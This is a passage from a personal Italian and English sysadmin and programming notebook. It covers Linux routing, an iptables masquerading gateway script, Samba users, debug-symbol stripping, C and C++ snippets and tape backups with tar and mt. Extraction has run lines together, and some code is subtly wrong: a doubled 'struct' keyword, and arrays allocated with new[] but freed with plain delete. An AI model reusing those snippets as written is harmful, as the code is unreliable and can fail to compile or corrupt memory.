o Counterpane Systems FAQ on Microsoft's PPTP Implementation - FAQ on the security flaws in Microsoft's PPTP Implementation.

DHCP: (Dynamic Host Configuration Protocol) o YoLinux DHCP Tutorial - How to set up a DHCP server. o ISC Dynamic Host Configuration Protocol - DHCP home page

Multicast: o YoLinux Tutorial: Configuring Linux for multicast - this tutorial in section above o Multicast over TCP/IP HOWTO

ISP's: (National/Global) o TheList.com - Comprehensive list of ISP's o Earthlink o Concentric o ATT Worldnet

NIS: (NFS infrastructure) o NIS Statup Instructions

Ethernet cables: o Making CAT 3, 5, 5E RJ45 Ethernet Cables o Wiring and Installation

Gigabit Ethernet VIX: Vienna Internet eXchange - European traffic exchange for ISP's

Test Internet Bandwidth: Test the speed of your connection by selecting this link - or this link (pick tachometer icon) Bandwidth tests and large file transfers Bandwidth explained and List of bandwidth test sites System monitor gkrellm - Monitors speed/bandwidth

Man Pages: icmp - Linux IPv4 ICMP kernel module ifport - select the transceiver type for a network interface usernetctl - allow a user to manipulate a network interface if permitted ripquery - query RIP (Routing Information Protocol) gateways gated - gateway routing daemon

Cambiare il nome dell’interfaccia di rete ( Linux )

Supponendo di voler cambiare il nome da eth1 a fddi0:ifdown eth1Editare il file /etc/modules.conf e modificare l’alias di eth1 sostituendo con fddi0Copiare il file /etc/sysconfig/network.scripts/ifcfg-eth1 in /etc/sysconfig/network.scripts/ifcfg-fddi0Editare ifcfg-fddi0 e sostituire in DEVICE=eth1 -> DEVICE=fddi0ifup fddi0

Page 55: Appunti Informatica

Configuring Static Routes (Linux)

From: http://www.centos.org/docs/5/html/5.1/Deployment_Guide/s1-networkscripts-static-routes.html

Routing will be configured on routing devices, therefore it should not be necessary to configure static routes on Red Hat Enterprise Linux servers or clients. However, if static routes are required they can be configured for each interface. This can be useful if you have multiple interfaces in different subnets. Use the route command to display the IP routing table.

Static route configuration is stored in a /etc/sysconfig/network-scripts/route-interface file. For example, static routes for the eth0 interface would be stored in the /etc/sysconfig/network-scripts/route-eth0 file. The route-interface file has two formats: IP command arguments and network/netmask directives.

IP Command Arguments Format

Define a default gateway on the first line. This is only required if the default gateway is not set via DHCP:

default X.X.X.X dev interface

X.X.X.X is the IP address of the default gateway. The interface is the interface that is connected to, or can reach, the default gateway.

Define a static route. Each line is parsed as an individual route:

X.X.X.X/X via X.X.X.X dev interface

X.X.X.X/X is the network number and netmask for the static route. X.X.X.X and interface are the IP address and interface for the default gateway respectively. The X.X.X.X address does not have to be the default gateway IP address. In most cases, X.X.X.X will be an IP address in a different subnet, and interface will be the interface that is connected to, or can reach, that subnet. Add as many static routes as required.

The following is a sample route-eth0 file using the IP command arguments format. The default gateway is 192.168.0.1, interface eth0. The two static routes are for the 10.10.10.0/24 and 172.16.1.0/24 networks:

default 192.168.0.1 dev eth010.10.10.0/24 via 192.168.0.1 dev eth0172.16.1.0/24 via 192.168.0.1 dev eth0

Static routes should only be configured for other subnets. The above example is not necessary, since packets going to the 10.10.10.0/24 and 172.16.1.0/24 networks will use the default gateway anyway. Below is an example of setting static routes to a different subnet, on a machine in a 192.168.0.0/24 subnet. The example machine has an eth0 interface in the 192.168.0.0/24 subnet, and an eth1 interface (10.10.10.1) in the 10.10.10.0/24 subnet:

10.10.10.0/24 via 10.10.10.1 dev eth1

Duplicate Default Gateways

If the default gateway is already assigned from DHCP, the IP command arguments format can cause one of two errors during start-up, or when bringing up an interface from the down state using the ifup command: "RTNETLINK answers: File exists" or 'Error: either "to" is a duplicate, or "X.X.X.X" is a garbage.', where

Page 56: Appunti Informatica

X.X.X.X is the gateway, or a different IP address. These errors can also occur if you have another route to another network using the default gateway. Both of these errors are safe to ignore.

Network/Netmask Directives Format

You can also use the network/netmask directives format for route-interface files. The following is a template for the network/netmask format, with instructions following afterwards:

ADDRESS0=X.X.X.XNETMASK0=X.X.X.XGATEWAY0=X.X.X.X

ADDRESS0=X.X.X.X is the network number for the static route. NETMASK0=X.X.X.X is the netmask for the network number defined with ADDRESS0=X.X.X.X. GATEWAY0=X.X.X.X is the default gateway, or an IP address that can be used to reach

ADDRESS0=X.X.X.X

The following is a sample route-eth0 file using the network/netmask directives format. The default gateway is 192.168.0.1, interface eth0. The two static routes are for the 10.10.10.0/24 and 172.16.1.0/24 networks. However, as mentioned before, this example is not necessary as the 10.10.10.0/24 and 172.16.1.0/24 networks would use the default gateway anyway:

ADDRESS0=10.10.10.0NETMASK0=255.255.255.0GATEWAY0=192.168.0.1ADDRESS1=172.16.1.0NETMASK1=255.255.255.0GATEWAY1=192.168.0.1

Subsequent static routes must be numbered sequentially, and must not skip any values. For example, ADDRESS0, ADDRESS1, ADDRESS2, and so on.

Below is an example of setting static routes to a different subnet, on a machine in the 192.168.0.0/24 subnet. The example machine has an eth0 interface in the 192.168.0.0/24 subnet, and an eth1 interface (10.10.10.1) in the 10.10.10.0/24 subnet:

ADDRESS0=10.10.10.0NETMASK0=255.255.255.0GATEWAY0=10.10.10.1

DHCP should assign these settings automatically, therefore it should not be necessary to configure static routes on Red Hat Enterprise Linux servers or clients.

Page 57: Appunti Informatica

Aggiungere Command Prompt al menù contestuale di explorer

1. In explorer, open Tools, Folder Options. 2. Select the File Types tab.

3. For Windows XP: Go to NONE / Folder.

4. For Windows 2000: Press n to scroll to the N/A section.

5. For Windows NT/98/95: Press f to scroll to the Folders section.

6. Select the entry labeled Folder

7. For Windows 2000/XP: Press Advanced button.

8. For Windows NT/98/95: Press Edit button.

9. Select New

10. In the action block type "Command Prompt" without the quotes.

11. In the app block type "cmd.exe" without the quotes.

12. Save and exit Folder Options.

Now right click on Start, you should have a new drop down option. Open explorer and right click on a folder, select Command Prompt and a command window opens in that folder.

[Preso da http://www.petri.co.il/add_command_prompt_here_shortcut_to_windows_explorer.htm]

Rimuovere le Debug information da un binario

The intention is that this option will be used in conjunction with -add-gnu-debuglink to create a two part executable. One a stripped binary which will occupy less space in RAM and in a distribution and the second a debugging information file which is only needed if debugging abilities are required. The suggested procedure to create these files is as follows:

1. Link the executable as normal. Assuming that is is called foo then... 2. Run objcopy -only-keep-debug foo foo.dbg to create a file containing the debugging info.

3. Run objcopy -strip-debug foo to create a stripped executable.

4. Run objcopy -add-gnu-debuglink=foo.dbg foo to add a link to the debugging info into the stripped executable.

Note - the choice of .dbg as an extension for the debug info file is arbitrary. Also the -only-keep-debug step is optional. You could instead do this:

1. Link the executable as normal. 2. Copy foo to foo.full

3. Run strip -strip-debug foo

Page 58: Appunti Informatica

4. Run objcopy -add-gnu-debuglink=foo.full foo

ie the file pointed to by the -add-gnu-debuglink can be the full executable. It does not have to be a file created by the -only-keep-debug switch.

[preso da http://www.redhat.com/docs/manuals/enterprise/RHEL-4-Manual/gnu-binutils/strip.html]

MIO:

Usare : strip –s foo per ottenere foo senza simboli di debug

Timers – microseconds resolution

The gettimeofday() function has a resolution of microseconds.

The functions gettimeofday and settimeofday can get and set the time as well as a timezone. The tv argument is a timeval struct, as specified in /usr/include/sys/time.h: struct timeval {long tv_sec; /* seconds */long tv_usec; /* microseconds */};

and gives the number of seconds and microseconds since the Epoch (see time(2)). The tz argument is a timezone : struct timezone {int tz_minuteswest; /* minutes W of Greenwich */int tz_dsttime; /* type of dst correction */};

The use of the timezone struct is obsolete; the tz_dsttime field has never been used under Linux - it has not been and will not be supported by libc or glibc. Each and every occurrence of this field in the kernel source (other than the declaration) is a bug. Thus, the following is purely of historic interest.

C++

int main(int argc, char *argv[]){ struct timeval time; struct struct timezone timez; int rc;

rc=gettimeofday(&time, &timez); if(rc==0) { printf("gettimeofday() successful.\n"); printf("time = %u.%06u, " "minuteswest = %d, " "dsttime = %d\n", time.tv_sec, time.tv_usec, timez.tz_minuteswest, timez.tz_dsttime ); } else { printf("gettimeofday() failed, errno = %d\n", errno); return -1; }

return 0;

Page 59: Appunti Informatica

}

Benchmark codice

int main(int argc, char *argv[]){struct timeval time,time1;struct timezone timez;gettimeofday(&time, &timez);<code to be timed>gettimeofday(&time1, &timez);cout<<"Total Time (usec): "<<((time1.tv_sec-time.tv_sec)*1000000+ time1.tv_usec-time.tv_usec)<<endl;return 0;}

Page 60: Appunti Informatica

Trasformare una macchina Linux in un Gateway

Questi riportati qui sotto sono i comandi da eseguire come root per far sì che la nostra macchina Linux si trasformi in un Gateway. Per far ciò bisogna che iptables sia installato e che funzioni correttamente.

Si hanno 3 possibilità:

1. Eseguirli di volta in volta 2. Creare un file che eseguirete quando sarà necessario 3. Scrivere questi comandi in un file che viene eseguito all’avvio per esempio rc.local in /etc

Io faccio l’esempio del file gw.sh che eseguirete quando ne avrete bisogno: #!/bin/sh

#Abilito il supporto forwarding/bin/echo "1" > /proc/sys/net/ipv4/ip_forward

#carico i moduli del kernel /sbin/modprobe ip_tables /sbin/modprobe ip_conntrack /sbin/modprobe iptable_nat /sbin/modprobe ipt_MASQUERADE

#Maschero i pacchetti [Al posto di 192.168.0.0 dovete mettere la classe di ip che avete scelto con gli 0 finali] /usr/sbin/iptables -t nat -A POSTROUTING -d ! 192.168.0.0/24 -j MASQUERADE

#Abilito l'ip forwarding solo per la mia rete /usr/sbin/iptables -A FORWARD -s 192.168.0.0/24 -j ACCEPT /usr/sbin/iptables -A FORWARD -d 192.168.0.0/24 -j ACCEPT /usr/sbin/iptables -A FORWARD -j DROP

Attenzione!!! Prima di eseguire questo file o i comandi in esso contenuti, dovreste “tirare su” l’interfaccia ethX su cui volete collegare la vostra rete, con ifconfig o rc.conf.

Salvato il file con il nome gw.sh da terminale entrate nella cartella dove l’avete salvato e digitate: chmod +x gw.sh

così facendo abilitate l’esecuzione del file, quando lo eseguirete ricordatevi che dovete essere root. Se scriverete i comandi di volta in volta da root o li aggiungerete in un file d’avvio [Es. rc.local in /etc] tralasciate: #!/bin/sh

Ora non vi resta che configuarare le altre macchine, assengnandogli un ip della classe che avete scelto e dargli l’ip del Gateway.

Usare come client macchine Arch GNU/Linux

Sempre da root, modificate /etc/rc.conf ( Sezione NETWORKING ) aggiungendo o modificando le righe gateway="default gw <ip_gateway>"ROUTES=(gateway)

sostituendo a <ip_gateway> l’indirizzo IP del vostro gateway.

Usare client con altre distribuzioni installate

Piu` in generale, se ci troviamo davanti altre macchine GNU/Linux, possiamo tranquillamente inserire, da root, il seguente comando route add default gw <ip_gateway>

Page 61: Appunti Informatica

per fare in modo che il sistema utilizzi il nostro gateway. Ricordatevi che questa direttiva al riavvio verra` persa: consiglio quindi di inserirla in uno script di avvio ( ad esempio, /etc/rc.d/rc.local per Slackware ). Se volete utilizzare gli strumenti che la vostra distro prevede a questo scopo ( come /etc/rc.d/rc.inet1.conf per Slackware ) vi rimando alla documentazione propria della distro.

Indicazioni generali

Sui nostri client (qualunque sia la distro installata ) dovremo anche inserire i server DNS per una corretta risoluzione dei nomi. In /etc/resolv.conf aggiungeremo queste righe ( questi IP sono utilizzabili, ma vi consiglio di utilizzare quelli che il vostro ISP vi ha indicato ): nameserver 130.244.127.161nameserver 212.216.112.222 nameserver 212.216.172.162

Fatto tutto ciò tutte le vostre macchine Linux della rete saranno abilitate per andare in internet!

Script SH che fà automaticamente quello di cui sopra:

Bisogna solo editare EXTIF="eth0" INTIF="fddi0" con le debite interfacce di rete.

[root@num_ds michele]# cat firewall.sh#!/bin/sh## rc.firewall-2.4FWVER=0.62## Semplice Masquerade Test iniziale per i kernel 2.4.x che utilizzano# IPTABLES.# Initial SIMPLE IP Masquerade test for 2.4.x kernels## Una volta che Masquerading ètato testato consiglio un ruleset molto# piùte di questi, che èasilare.##

echo -e "nCaricamente di rc.firewall, versione $FWVER..n"

# Dove risiede il programma IPTABLES?#

IPTABLES=/sbin/iptables

# Settings per le inferfacce ESTERNE e INTERNE per la rete## Ogni rete Mascherata ha bisogno di avere almeno due interfacce.# Una interna ed una esterna.##

EXTIF="eth0"INTIF="fddi0"echo " Interfaccia Esterna: $EXTIF"echo " Interfaccia Interna: $INTIF"

#==========================================================================##==Non c'èisogno di editare oltre questa riga per il MASQ Test iniziale==#

Page 62: Appunti Informatica

echo -en " caricando i moduli: "

#Verifica che tutti i moduli hanno tutte le dipendenze richieste#

echo " - Sto verificando che tutti i moduli siano a posto"/sbin/depmod -a

echo -en "ip_tables, "/sbin/insmod ip_tables

echo -en "ip_conntrack, "/sbin/insmod ip_conntrack

# Abilita il tracking FTP, inserisci un '#' per disattivarloecho -en "ip_conntrack_ftp, "/sbin/insmod ip_conntrack_ftp

echo -en "iptable_nat, "/sbin/insmod iptable_nat

# Abilita il NAT FTP per default, commenta con '#' per disattivarloecho -en "ip_nat_ftp, "/sbin/insmod ip_nat_ftp

# Qui ci andranno altri moduli esistenti

echo ". Finito di caricare i moduli."

# Abilita l'ip forwarding, gli utenti di redhat potrebbero cambiare# l'opzione di /etc/sysconfig/network da:## FORWARD_IPV4=false# to# FORWARD_IPV4=true#echo " abilito il forwarding.."echo "1" > /proc/sys/net/ipv4/ip_forward

# Utenti IP Dinamici, abilitate questa opzione (1 per default)echo " abilito DynamicAddr.."echo "1" > /proc/sys/net/ipv4/ip_dynaddr

# Abilita un semplice IP forwarding e Masquerading## Come giàetto prima, IP Masquerading èna forma di SNAT.## Il seguente esempio fa riferimento ad una LAN interna con indirizzi# di classe C (192.168.0.x) e con una subnet mask di 255.255.255.0 (o a 24 bit)# Questo esempio maschereràl traffico interno fuori su internet e non permette# il traffico non inizializzato all'interno della rete interna.#

# Pulizia della configurazione precedente## Se non specificato, i defaults per INPUT e OUTPUT sono ACCEPT# Il default per FORWARD èROP#echo " sto pulendo ogni regola esistente e settando le policy di default.."$IPTABLES -P INPUT ACCEPT

Page 63: Appunti Informatica

$IPTABLES -F INPUT$IPTABLES -P OUTPUT ACCEPT$IPTABLES -F OUTPUT$IPTABLES -P FORWARD DROP$IPTABLES -F FORWARD$IPTABLES -t nat -F

echo " FWD: Accetto tutte le connessioni OUT e solo quelle esistenti e pertinenti IN"$IPTABLES -A FORWARD -i $EXTIF -o $INTIF -j ACCEPT$IPTABLES -A FORWARD -i $INTIF -o $EXTIF -j ACCEPT$IPTABLES -A FORWARD -j LOG

echo " Abilito la funzionalitàNAT su $EXTIF"$IPTABLES -t nat -A POSTROUTING -o $EXTIF -j MASQUERADE$IPTABLES -t nat -A POSTROUTING -o $INTIF -j MASQUERADE

echo -e "nrc.firewall-2.2 v$FWVER finito.n"

Page 64: Appunti Informatica

Adding Users and Restarting Samba ( Linux )

At this stage, we are almost done. All is left to do is add a user and restart Samba. In this example we are going to add user john and assign him a Linux password and a Samba password which will be jrambo. Open your terminal window and type in the following, entering in jrambo as the password.

What this has done is created a Linux user named john with a Linux and Samba password as jrambo. This should be the same username and password that you log onto to the Windows pc with. When you create a new Linux user, it will automatically create a home share for this person. In this case it will be /home/john

Now Samba has to be restarted so that all of the changes that we have made will take effect. Open a terminal window and type in the following

Now if you followed the instructions throughout this document, Samba should be setup for file sharing with Windows. If you logon onto Windows with the username john and password of jrambo, you should see the shares in your network neighborhood. And if you browse to the music share, you will find your mp3 files!

Page 65: Appunti Informatica

Manipulating Directories ( C-C++)

From : http://www.informit.com/guides

Last updated Jul 29, 2005.

Standard C++ doesn't have a library for manipulating directories. The closest thing you can get is Boost's filesystem library. However, most implementations nowadays support the quasi-standard <dirent.h> and <dir.h> libraries. These libraries, originally written in C, enable you to list the files in a directory, change the current directory, create a new directory and delete an existing directory.

Traversing a Directory

The <dirent.h> header declares functions for opening, reading, rewinding and closing a directory. To view the files in a directory, you have to open it first using the opendir() function: DIR * opendir(const char * path);

opendir() returns a pointer to DIR. DIR is a data structure that represents a directory. A NULL return value indicates an error. path must be a name of an existing directory.To traverse a successfully opened directory, use readdir():struct dirent * readdir (DIR * pdir);

pdir is the pointer obtained from a previous opendir() call. readdir() returns a pointer to a dirent structure whose data member, d_name, contains the name of the current file (the rest of dirent's members depend on the specific file system installed on your machine so I won't discuss them here). Each successive call to readdir() advances to the next file in the directory. readdir() returns NULL either in the event of an error or once you have traversed all the files in the directory. To distinguish between these two conditions, check errno after every readdir() call. Since readdir() changes errno only if an error has occurred, you need to reset it explicitly before each readdir() call.The rewinddir() function resets a directory stream to the first entry:void rewinddir(DIR *pdir);

rewinddir() also ensures that the directory accurately reflects any changes to the directory (file deletion, renaming etc.) since the last opendir() or rewinddir() calls.Use closedir() to close the directory once you are done with it:int closedir (DIR * pdir);

pdir is the pointer obtained from a previous opendir() call. The following C program lists the contents of the current working directory:#include <errno.h>#include <dirent.h>#include <stdio.h>#include <stdlib.h>

int main(){ DIR *pdir; struct dirent *pent;

pdir=opendir("."); //"." refers to the current dir if (!pdir){ printf ("opendir() failure; terminating"); exit(1); } errno=0; while ((pent=readdir(pdir))){ printf("%s", pent->d_name); } if (errno){ printf ("readdir() failure; terminating"); exit(1); }

Page 66: Appunti Informatica

closedir(pdir);}

Create, Delete and Change a Directory

Other directory-related operations, such as creating, deleting, and changing a directory, are grouped in another quasi-standard library called <dir.h>. In POSIX systems, these functions are often declared in <unistd.h>. The mkdir() function creates a new directory:int mkdir(const char * dirname, [mode_t perm]);

dirname contains the new directory's name. An invalid directory name causes mkdir() to fail. perm indicates the directory's permissions. This argument exists only in the POSIX version of this function. The function rmdir() deletes an existing directory:int rmdir(const char * dirname);

rmdir() fails if the directory isn't empty. To remove a directory that contains files, you need to delete these files first and then call rmdir().To obtain the full path name (including the drive) of the current working directory, call the getcwd() function:char *getcwd(char *path, int num);

This function requires special attention. path is a char array of num characters. If the full pathname length (including the terminating '\0') is longer than num, the function call fails. If you don't know the pathname's length, pass NULL as the first argument. In this case, getcwd() uses malloc() to allocate a buffer large enough to store the current directory and returns its address to the caller. It's the caller's responsibility to release that buffer afterwards.chdir() changes the process's current working directory:int chdir(const char * dirname);

If dirname isn't a valid path name or if the process doesn't have the necessary permissions chdir() fails.

Summary

The <dirent.h> and <dir.h> legacy libraries lend themselves easily to an object-oriented face-lift. For instance, the opendir() and closedir() pair of functions fits neatly into the well-known Resource Acquisition is Initialization idiom. Similarly, instead of bare pointers, such as DIR* and dirent *, one could use iterators. An iterator-based interface would allow you to use ++ to advance to the next file, instead of calling readdir() repeatedly. More importantly, it would enable you to use STL algorithms to manipulate directories. Boost already offers a file-system library designed according to these principles. Hopefully, it will be incorporated into standard C++ in the future.In the meantime, familiarity with these classic libraries is indispensable, especially if you're aiming at cross-platform solutions.

Page 67: Appunti Informatica

RPM Commands ( Linux )

Con I src.rpm si lavora così:

source RPM (doing an 'rpm --rebuild rust-X.X-X.src.rpm' then installing the resulting rust-X.X.X-YYY.rpm).

rpmbuild –rebuild xxxx.src.rpm

LIST rpms installati :

rpm –qa | grep ......

LIST files installati da un rpm :

rpm –ql <rpm>

Dati e requirements di un rpm installato:

rpm –qi [--requires] <rpm>

Page 68: Appunti Informatica

STL Map iterators and deleting ( C++ )

I'm having issues with std::maps. I have a map with pointers to animations inside it, and when the program has finished, I would like it to delete them.

Q1. Does std::map.erase() properly delete pointers, or does it create memory leaks?

Q2. Without knowing if erase() removes pointers properly or not, I have taken the assumption that it doesn't, and have tried to loop through the map with an iterator, but am having problems. Here is my code:

// the main iterator, used for navigating through mapstd::map < std::string, Ani* > ::iterator looper = aniPool.begin();// a temperory iterator, used so that when I delete an element, the looping iterator does not lose its positionstd::map < std::string, Ani* > ::iterator elementToErase;//loops through until none leftwhile (looper != aniPool.end()) {

// sets the temporary iterator to the element to removeelementToErase = looper;// move the looping iteratorlooper++;// deletes the animation, using the temp iteratordelete aniPool[elementToErase->first];// removes the deleted elementaniPool.erase(elementToErase);

}

No, STL containers don't clean up memory, so it'll cause a leak.

Here is some tested code for deleting map elements; this'll work for pretty much any container (all of the ones that I've tried anyway.):

std::map<int, char*> Mappy;

int main(){

for(int Index = 0; Index < 10; ++Index)Mappy.insert(std::make_pair(Index, new char[10]));

for(std::map<int, char*>::iterator MapItor = Mappy.begin(); MapItor != Mappy.end(); ++MapItor)

{char* Value = (*MapItor).second;delete Value;

}system("pause");return 0;

}

. . . . . . . . .

By any chance are you using the [] operator on the map after you've called Destroy()? The subscript operator will check to see if an element exists, and if it doesn't it will create an element. For example:

Page 69: Appunti Informatica

#include <string>#include <map>#include <iostream>

int main(){ std::map<std::string, int> foo;

foo["bar"] = 5; std::cout << foo["bar"] << std::endl;

if ( foo.empty() ) std::cout << "foo is empty 1" << std::endl;

foo.clear();

if ( foo.empty() ) std::cout << "foo is empty 2" << std::endl;

// using the [] operator will create an element "bar", and foo will no longer by empty std::cout << foo["bar"] << std::endl;

if ( foo.empty() ) std::cout << "foo is empty 3" << std::endl;}

Will output:5foo is empty 20

Page 70: Appunti Informatica

Managing Linux Modules ( Linux )

lsmod lista moduli.

Per inserire un modulo : modprobe aic7xxx

Per avere per il modulo all’avvio del sistema:

mkinitrd -f /boot/initrd-2.4.21-37.EL.img 2.4.21-37.EL

Page 71: Appunti Informatica

How to use your Tapedrive ( Linux )

( Preso da : http://nic.phys.ethz.ch/readme/80 )

Several of our Linux workstations are equiped with a tape drive. Tapes are normally used to exchange data, for backups Netbackup is the preferred solution. See How to install Netbackup.

Devices Samples with tar Multiple files on the same tape Backup across multiple tapes Using cpio find the content of a tape

All tapedrives are attached over a SCSI-controller. To access a tape, choose the right devicenode: /dev/st0 Linux 2.2 / D-PHYS1, first tapedrive, rewinds when closed /dev/nst0 Linux 2.2 / D-PHYS1, first tapedrive, leaves tape when closed

Currently all machines equiped with a tapedrive are running Linux 2.2. Come back to this tutorial after our upgrade of those workstations!

To save and restore data on tape, we use tar, mt and cpio. dump is not discussed here - it should not be used in Linux >= 2.4 against a mounted filesystem.

Now put a fresh cartdrige of the right type in your tapedrive and go through this tutorial:

check if the tape is online

me@host:~$ mt -f /dev/st0 statusdrive type = Generic SCSI-2 tapedrive status = 318767104sense key error = 0residue count = 0file number = 0block number = 0Tape block size 0 bytes. Density code 0x13 (DDS (61000 bpi)).Soft error count since last status=0General status bits on (45010000):BOT WR_PROT ONLINE IM_REP_EN

A cartdrige is inserted and ready to write. Because we used /dev/st0, the tape is now positioned at the beginning.

save the content of a directory

We have a directory sample in our home containing several files. Lets put them on the tape:

me@host:~$ tar cvf /dev/st0 samplesample/sample/picture.jpegsample/text.txtsample/source.c

Page 72: Appunti Informatica

list the files on the tape

me@host:~$ tar tvf /dev/st0drwxr-xr-x me/mygroup 0 2003-10-31 12:54:22 sample/-rw------- me/mygroup 54864 2003-10-31 12:53:56 sample/picture.jpeg-rw-r--r-- me/mygroup 1297 2003-10-31 12:54:03 sample/text.txt-rw-r--r-- me/mygroup 58 2003-10-31 12:54:22 sample/source.c

eject the cartdrige

me@host:~$ mt -f /dev/st0 rewoffl

The cartdrige will be rewinded and ejected by the tapedrive. It's now time to lable your cartdrige. It's really difficult to extract the information about a tape without knownlege how it was written! May be that it's also the time to write protect the cartdrige.

restore the files

Reinsert the cartdrige in the tapedrive.me@host:~$ tar xvf /dev/st0sample/sample/picture.jpegsample/text.txtsample/source.c

We have now restored the content of the archive on tape.

restore a single file

me@host:~$ tar xvf /dev/st0 sample/source.csample/source.c

Only the file source.c was restored. Be careful - you need to give the exact filname(s) to tar and it takes often a long time to scan the tape until tar find the right file.

Now some more sophisticated exemples. A cartdrige may contain more then one file. So you may put more then one backup on the same cartdrige. Now we use no longer /dev/st0 which rewinds the tape after usage, instead we use /dev/nst0 which leaves the tape on the position when closed.

check if the tape is online

me@host:~$ mt -f /dev/st0 statusdrive type = Generic SCSI-2 tapedrive status = 318767104sense key error = 0residue count = 0file number = 0block number = 0Tape block size 0 bytes. Density code 0x13 (DDS (61000 bpi)).Soft error count since last status=0General status bits on (45010000):BOT WR_PROT ONLINE IM_REP_EN

Page 73: Appunti Informatica

Note the status bits at the end of the output. These are useful, but are often cryptic. Here is an explanation of the most important ones:

Status Bit Description

BOT The tape is positioned at the beginning of the first file.

EOT A tape operation has reached the physical End Of Tape.

EOF The tape is positioned just after a filemark.

WR_PROTThe tape (or drive) is write-protected. For some drives this can also mean that the drive does not support writing on the current medium type.

ONLINE The drive has a tape in place and ready for operation.

DR_OPENDoor is open. Depending on the type of drive, this usually means that the drive does not have a tape in place.

IM_REP_ENImmediate report mode. This bit is set if there are no guarantees that the data has been physically written to the tape when the write call returns. It is set to zero only when the driver does not buffer data and the drive is set not to buffer data.

SM The tape is currently positioned at a setmark. DDS specific.

EOD The tape is positioned at the end of recorded data. DDS specific.

D_6250D_1600D_800

This "generic" status information reports the current density setting for 9-track 1/2 inch tape drives only.

save a directory

me@host:~$ tar cvf /dev/nst0 samplesample/sample/picture.jpegsample/text.txtsample/source.c

This is now our first file on the tape. Because we used /dev/nst0, tape is now positioned at the end of this file.

save another directory

me@host:~$ tar cvf /dev/nst0 moresamplemoresample/moresample/source.cmoresample/binary

This is now our second file on the tape.

eject the cartdrige

me@host:~$ mt -f /dev/st0 rewoffl

Now it's the time to lable the cartdrige. There is now way to "see" how many files are on a tape.

restore the files

Restore from the first backup is simple. But we restore now the files from the second :-)me@host:~$ mt -f /dev/nst0 fsf 1

Page 74: Appunti Informatica

me@host:~$ tar xvf /dev/nst0moresample/moresample/source.cmoresample/binaryme@host:~$ mt -f /dev/nst0 rewind

First we forward the tape to the second file. Then we restore the data and at the end we rewind the tape. See the manpage of mt for all options how to forward / rewind a tape.

Often, a cartdrige is too small to hold all the data you want to save. tar knows about "multivolume" with the command line option -M and will prompt you for the next tape:

me@host:~$ tar cvfM /dev/st0 bigdirbigdir/bigdir/aebigdir/archbigdir/ash...Prepare volume #2 for `/dev/st0' and hit return:bigdir/lnbigdir/loadkeys...

To list or restore such an archive, you need to give tar the option -M. So be sure to lable the cartdrige.

Some people prefer to write their backups with cpio. I don't. cpio is a very feature rich command, on the other hand I always need the manpage when I want to create or expand an archive. cpio expects a filelist on STDIN and creates the archive on STDOUT or expects the archive for restoring on STDIN. To save data with cpio, you allways need find to create the filelist.

save the content of a directory

me@host:~$ find sample | cpio -ov -H newc > /dev/st0samplesample/picture.jpegsample/text.txtsample/source.c112 blocks

list the files on the tape

me@host:~$ cpio -itv < /dev/st0drwxr-xr-x me/mygroup 0 2003-10-31 12:54:22 sample/-rw------- me/mygroup 54864 2003-10-31 12:53:56 sample/picture.jpeg-rw-r--r-- me/mygroup 1297 2003-10-31 12:54:03 sample/text.txt-rw-r--r-- me/mygroup 58 2003-10-31 12:54:22 sample/source.c

restore the files

me@host:~$ cpio -ivd < /dev/st0samplesample/picture.jpegsample/text.txtsample/source.c112 blocks

Page 75: Appunti Informatica

See the manpage of cpio for all options.For the last time: lable the cartdrige because the format of cpio and tar are not compatible.

Now worst case. You have an unlabeled cartdrige in front of you and you don't know which data is on it. There are some tricks to find it out. Insert the cartdrige and find out the type of archive on it:

me@host:~$ file - < /dev/nst0standard input: GNU tar archive

The first file on this tape is a tar archive.

me@host:~$ mt -f /dev/nst0 fsf 1

Forward tape to the next file.

me@host:~$ file - < /dev/nst0standard input: POSIX tar archive

The second file is also a tar archive - but it seems to be created on a UNIX like Solaris.

me@host:~$ mt -f /dev/nst0 fsf 1

Forward tape to the next file.

me@host:~$ file - < /dev/nst0standard input: ASCII cpio archive (SVR4 with no CRC)

The third file on this tape is a cpio archive.

me@host:~$ mt -f /dev/nst0 fsf 1

Forward tape to the next file.

me@host:~$ file - < /dev/nst0standard input: file: read failed (Input/output error).

OK, it's the end of the tape.

me@host:~$ mt -f /dev/nst0 rewind

Now we write down our seen files:

1 GNU tar archive

2 Posix tar archive

3 cpio archive

To see the content of each file on the tape, we use now the approriate command to extract the archives:

me@host:~$ tar tvf /dev/nst0. . . me@host:~$ tar tvf /dev/nst0. . .me@host:~$ cpio -itv < /dev/st0. . .

Page 76: Appunti Informatica

ALTRE NOZIONI: (http://www.chem.tamu.edu/services/NMR/notes/notes_1.html )

mt retension This command retension the tape to avoid lost data from tape being stretched. This should be done with new tapes and any tape that has not been used for 'awhile'.

mt rewind Rewind the tape to the beginning.

mt offline Rewind the tape if necessary and take unit off line. This should be done before you remove your tape from the drive.

mt fsf # File Skip Forward # block(s). This skips to just past an EOF mark, so that you are ready to read or write another data block after the previous one.

mt status Reports the status of the tape, including the file and block numbers. File will indicate the number of EOF marks skipped, block is an offset into the current file.

mt asf # Skip to an absolute position on the tape. Effectively combines the functions of the rewind and fsf commands.

mt eom Skip to 'End Of Media' position on the tape. This moves past the last EOF mark on the tape so that you can append a new tar file on the tape. You do not have to know how many tar files currently exist on the tape. After the 'eom' command, 'status' will show the number of files present.

Normal operation would be to use tar to create an archive on the tape after retensioning and rewinding it. This will also write an EOF mark and you can use the -t option to get a directory of the tar file.

Later, when you want to add data to the tape, use either 'mt fsf 1' or 'mt eom' to skip over the existing data and position the tape just past the EOF mark. 'mt status' should show file=1 and block=0. You can then use tar to create an new archive file here with the files to be added to the tape. 'mt offline' will rewind the tape and take the unit offline.

Still later, mt fsf 2 (or 'mt eom') will skip over both of these file so that you can write a third data set, the same way you did the second.

When you want to access nmr data from the second data set, for instance, you would use mt fsf 1 to skip the first file, and tar -x <filename> to extract the desired data. mt status would then show file=1 and block=xxxx, where xxxx is some offset into the file. mt fsf 1 would then skip forward over 1 EOF mark, leaving the tape positioned at the third data set ready to read data. mt status would show file=2 block=0. Note that the mt fsf # command skips forward over the specified number of EOF marks, not to an absolute tape archive file position. Jumping to an absolute tape file number would require doing a tape rewind first. You can however use mt asf # to do an Absolute Skip Forward. The argument supplied is the file number of interest, with the first being 0. This is logically equivalent to doing mt rewind followed by mt fsf # except that the rewind is omitted if the desired location is forward of the current location. Effectively, the system uses mt status to find the current location and will skip forward (#-current) EOF marks.

Please note that you cannot skip to the beginning of the second block, overwrite the data there with new data, and keep the third data block. The tape is inherently serial access rather than random access, and you cannot modify information in the middle of the tape. You could however overwrite the last data block on the tape.

